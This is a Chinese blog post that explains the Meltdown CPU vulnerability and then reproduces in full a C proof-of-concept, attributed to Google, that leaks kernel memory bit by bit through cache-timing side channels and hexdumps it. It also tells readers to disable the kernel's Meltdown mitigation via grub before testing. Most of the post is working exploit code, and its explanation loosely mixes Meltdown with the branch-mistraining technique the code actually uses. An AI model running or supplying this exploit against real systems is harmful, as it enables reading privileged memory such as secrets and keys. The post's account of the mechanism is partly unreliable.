X86 CPU 漏洞 Meltdown 原理及google攻击代码

南宫正阳

2023-12-01

meltdown的原理其实很简单了，访问一个虚拟地址要走page table walk，现在一般都是4级页表了，页的属性中有一位标志是区分是内核页还是用户页的。程序执行在用户模式下是不允许访问内核地址的原因就是，用户态使用用户态下的页完成虚拟地址向物理地址的转换，同理内核态使用内核态的页。那好了，meltdown发生的窗口期就是因为乱序执行，当用户态非法访问一个内核态的地址时，还没来得及做页属性的检查，就把数据读到cache里，之后再去cache里把数据拿出来。

原理两条汇编指令就可以解释的非常清楚：

mov al, byte ptr [r15]	 ; r15 保存一个内核的地址
shl rax, 6

第一条指令 mov al , [kernel address] 会触发page fault，从而走page table walk，这时要考虑页属性的权限检查了。

第二条指令 shl rax, 6 正常没有meltdown的情况下是不能执行的，因为第一条指令页表权限检查不会过的。但是由于乱序执行在page fault页表权限检查的同时执行了第二条指令，导致内核的数据被读入cache里。这个窗口期，Intel core架构的cpu都会存在，但是amd的cpu就没有这样的窗口期。intel这样设计就是奔着性能去的，安全性降低了。反而看看AMD 既要性能又要安全。AMD确实良心。

google发布的攻击代码如下，感兴趣的同学可以去测试，现在的linux内核都打补丁了，在测试之前，请从grub里关掉meltdown补丁。

#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <err.h>
#include <stdbool.h>
#include <ctype.h>

/* memory clobber is not actually true, but serves as a compiler barrier */
#define pipeline_flush() asm volatile("mov $0, %%eax\n\tcpuid" : /*out*/ : /*in*/ : "rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
#define read_byte(addr) asm volatile("mov (%0), %%r11"::"r"(addr):"r11","memory")
#define rdtscp() ({unsigned int result; asm volatile("rdtscp":"=a"(result)::"rdx","rcx","memory"); result;})

int timed_load(void *ptr) {
  pipeline_flush();
  unsigned int t1 = rdtscp();
  pipeline_flush();
  read_byte(ptr);
  unsigned int t2 = rdtscp();
  pipeline_flush();
  return t2 - t1;
}

/* leak_func_condition is in an otherwise unused page to prevent interference */
unsigned long leak_func_condition_[0x3000];
#define leak_func_condition (leak_func_condition_ + 0x1800)

/* Most code isn't optimized to make the compiler's output more predictable,
 * but this function should probably be optimized.
 */
__attribute__((noclone,noinline,optimize(3))) unsigned char leak_func(uint8_t *timing_leak_array, uint8_t *source_ptr, unsigned int bitmask, unsigned int bitshift) {
  pipeline_flush();
  /* run the branch if the high-latency load returns zero.
   * if the logic was the other way around, Intel's heuristic
   * where high-latency loads speculatively return zero (?)
   * would probably bite.
   */
  if (__builtin_expect(*leak_func_condition == 0, 1)) {
    return timing_leak_array[((*source_ptr)&bitmask)<<bitshift];
  }
  return 0;
}

/* "leak" from here when conditioning the branch predictor */
uint8_t dummy_array[1];

/* timing_leak_array is in an otherwise unused page to prevent interference */
uint8_t timing_leak_array_[10000];
#define timing_leak_array (timing_leak_array_ + 4096)

int freshen_fd;

/* Leak `*(uint8_t*)byte_addr & (1<<bit_idx)` from the kernel.
 * This function makes 16 attempts to leak the data.
 * Before each attempt, data is leaked from the `dummy_array`
 * in userspace 31 times, then discarded, to convince the
 * CPU to go down the wrong path when we try to leak from the
 * kernel.
 */
int leak_bit(unsigned long byte_addr, int bit_idx) {
  uint8_t *secret_arrays[32];
  for (int i=0; i<31; i++) {
    secret_arrays[i] = dummy_array;
  } 
  secret_arrays[31] = (void*)byte_addr;

  unsigned int votes_0 = 0;
  unsigned int votes_1 = 0;
  for (int i=0; i<16*32; i++) {
    //int attempt = (i >> 5) & 0xf;
    int mislead = i & 0x1f;
    uint8_t *cur_secret_array = secret_arrays[mislead];
    char discard;
    pread(freshen_fd, &discard, 1, 0);
    //
    //printf("discard is %c \n", discard);
    //
    pipeline_flush();
    clflush(timing_leak_array);
    clflush(timing_leak_array + (1<<10));
    *leak_func_condition = (mislead == 31);
    pipeline_flush();
    clflush(leak_func_condition);
    pipeline_flush();
    leak_func(timing_leak_array, cur_secret_array, 1<<bit_idx, 10-bit_idx);
    uint32_t latency_at_b0 = timed_load(timing_leak_array);
    uint32_t latency_at_b1 = timed_load(timing_leak_array + (1<<10));
    if (mislead == 31) {
      //printf("(%d,%d)\t", latency_at_b0, latency_at_b1);
      votes_0 += (latency_at_b0 < latency_at_b1);
      votes_1 += (latency_at_b1 < latency_at_b0);
    }
  }
  //printf("\nvotes_0: %d\nvotes_1: %d\n", votes_0, votes_1);
  return votes_0 < votes_1;
}

uint8_t leak_byte(unsigned long byte_addr) {
  uint8_t res = 0;
  for (int bit_idx = 0; bit_idx < 8; bit_idx++) {
    res |= leak_bit(byte_addr, bit_idx) << bit_idx;
  }
  return res;
}

void hexdump_memory(unsigned long byte_addr_start, unsigned long byte_count) {
  if (byte_count % 16)
    errx(1, "hexdump_memory called with non-full line");
  bool last_was_all_zeroes = false;
  for (unsigned long byte_addr = byte_addr_start; byte_addr < byte_addr_start + byte_count;
          byte_addr += 16) {
    int bytes[16];
    bool all_zeroes = true;
    for (int i=0; i<16; i++) {
      bytes[i] = leak_byte(byte_addr + i);
      if (bytes[i] != 0)
        all_zeroes = false;
    }

    if (all_zeroes) {
      if (!last_was_all_zeroes) {
        puts("[ zeroes ]");
      }
      last_was_all_zeroes = true;
      continue;
    }
    last_was_all_zeroes = false;

    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%016lx  ", byte_addr);
    for (int i=0; i<16; i++) {
      linep += sprintf(linep, "%02hhx ", (unsigned char)bytes[i]);
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<16; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

int main(int argc, char **argv) {
  if (argc != 3)
    errx(1, "invocation: %s <kernel_addr> <length>", argv[0]);
  unsigned long start_addr = strtoul(argv[1], NULL, 16);
  unsigned long leak_len = strtoul(argv[2], NULL, 0);

  /* we will read from this fd before every attempt to leak data
   * to make the kernel load the core_pattern (and a couple other
   * data structures) into the CPU's data cache
   */
  freshen_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
  if (freshen_fd == -1)
    err(1, "open corepat");

  hexdump_memory(start_addr, leak_len);
}

github ：https://github.com/Tinycl/google_poc

X86 CPU 漏洞 Meltdown 原理及google攻击代码

相关阅读

相关文章

相关问答

相关文档